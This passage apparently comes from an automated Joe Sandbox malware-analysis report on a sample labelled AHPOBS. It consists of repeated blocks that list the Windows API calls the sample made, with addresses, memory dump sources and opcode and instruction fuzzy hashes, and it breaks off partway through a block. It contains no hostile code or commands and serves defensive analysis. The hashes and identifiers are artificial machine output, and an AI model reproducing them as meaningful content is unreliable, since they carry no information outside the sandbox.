                                      • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                      • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                      • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                      • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                      • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                      • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                      • __isleadbyte_l.LIBCMT ref: 004208A6
                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                      • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                      • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                      • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                      APIs
                                      • GetParent.USER32(?), ref: 004503C8
                                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Proc$Parent
                                      • String ID:
                                      • API String ID: 2351499541-0
                                      • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                      • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                      • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                      • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                      • TranslateMessage.USER32(?), ref: 00442B01
                                      • DispatchMessageW.USER32(?), ref: 00442B0B
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchTranslate
                                      • String ID:
                                      • API String ID: 1795658109-0
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                      • GetCaretPos.USER32(?), ref: 004743B2
                                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                      • GetForegroundWindow.USER32 ref: 004743EE
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      APIs
                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                      • _wcslen.LIBCMT ref: 00449519
                                      • _wcslen.LIBCMT ref: 00449526
                                      Similarity
                                      • API ID: MessageSend_wcslen$_wcspbrk
                                      • String ID:
                                      • API String ID: 2886238975-0
                                      APIs
                                      Similarity
                                      • API ID: __setmode$DebugOutputString_fprintf
                                      • String ID:
                                      • API String ID: 1792727568-0
                                      APIs
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      APIs
                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                      Similarity
                                      • API ID: ErrorLastacceptselect
                                      • String ID:
                                      • API String ID: 385091864-0
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                      • GetStockObject.GDI32(00000011), ref: 00430258
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                      • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                      Similarity
                                      • API ID: Window$CreateMessageObjectSendShowStock
                                      • String ID:
                                      • API String ID: 1358664141-0
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 0043392E
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • __wsplitpath.LIBCMT ref: 00433950
                                      • __wcsicoll.LIBCMT ref: 00433974
                                      • __wcsicoll.LIBCMT ref: 0043398A
                                      Similarity
                                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                      • String ID:
                                      • API String ID: 1187119602-0
                                      APIs
                                      Similarity
                                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                                      • String ID:
                                      • API String ID: 1597257046-0
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                      • __malloc_crt.LIBCMT ref: 0041F5B6
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                      Similarity
                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                      • String ID:
                                      • API String ID: 237123855-0
                                      APIs
                                      Similarity
                                      • API ID: DeleteDestroyObject$IconWindow
                                      • String ID:
                                      • API String ID: 3349847261-0
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                      Similarity
                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                      • String ID:
                                      • API String ID: 2223660684-0
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                      • LineTo.GDI32(?,?,?), ref: 00447326
                                      • EndPath.GDI32(?), ref: 00447336
                                      • StrokePath.GDI32(?), ref: 00447344
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                      • String ID:
                                      • API String ID: 2783949968-0
                                      • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                      • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                      • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                      • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                      • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                      • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                      • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                      APIs
                                      • __getptd_noexit.LIBCMT ref: 00415150
                                        • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                        • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                        • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                        • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                        • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                      • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                      • __freeptd.LIBCMT ref: 0041516B
                                      • ExitThread.KERNEL32 ref: 00415173
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                      • String ID:
                                      • API String ID: 1454798553-0
                                      • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                      • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                      • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                      • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: Q\E
                                      • API String ID: 909875538-2189900498
                                      • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                      • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                      • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                      • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove_strncmp
                                      • String ID: U$\
                                      • API String ID: 2666721431-100911408
                                      • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                      • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                      • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                      • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • __wcsnicmp.LIBCMT ref: 00467288
                                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                      • String ID: LPT
                                      • API String ID: 3035604524-1350329615
                                      • Opcode ID: 3b3dbf2697f36bc8cb764afbf437dd2aa6ce189acf07b49d6969421755f5c9d6
                                      • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                      • Opcode Fuzzy Hash: 3b3dbf2697f36bc8cb764afbf437dd2aa6ce189acf07b49d6969421755f5c9d6
                                      • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \$h
                                      • API String ID: 4104443479-677774858
                                      • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                      • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                      • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                      • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID: &
                                      • API String ID: 2931989736-1010288
                                      • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                      • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                      • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                      • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                      • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                      • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                      • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                      APIs
                                      • _wcslen.LIBCMT ref: 00466825
                                      • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CrackInternet_wcslen
                                      • String ID: |
                                      • API String ID: 596671847-2343686810
                                      • Opcode ID: 7cb74d60865eca5b28057979f277cd03318605ef9fe3268a007aa21ef86e616b
                                      • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                      • Opcode Fuzzy Hash: 7cb74d60865eca5b28057979f277cd03318605ef9fe3268a007aa21ef86e616b
                                      • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                      • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                      • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                      • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                      APIs
                                      • _strlen.LIBCMT ref: 0040F858
                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                      • _sprintf.LIBCMT ref: 0040F9AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
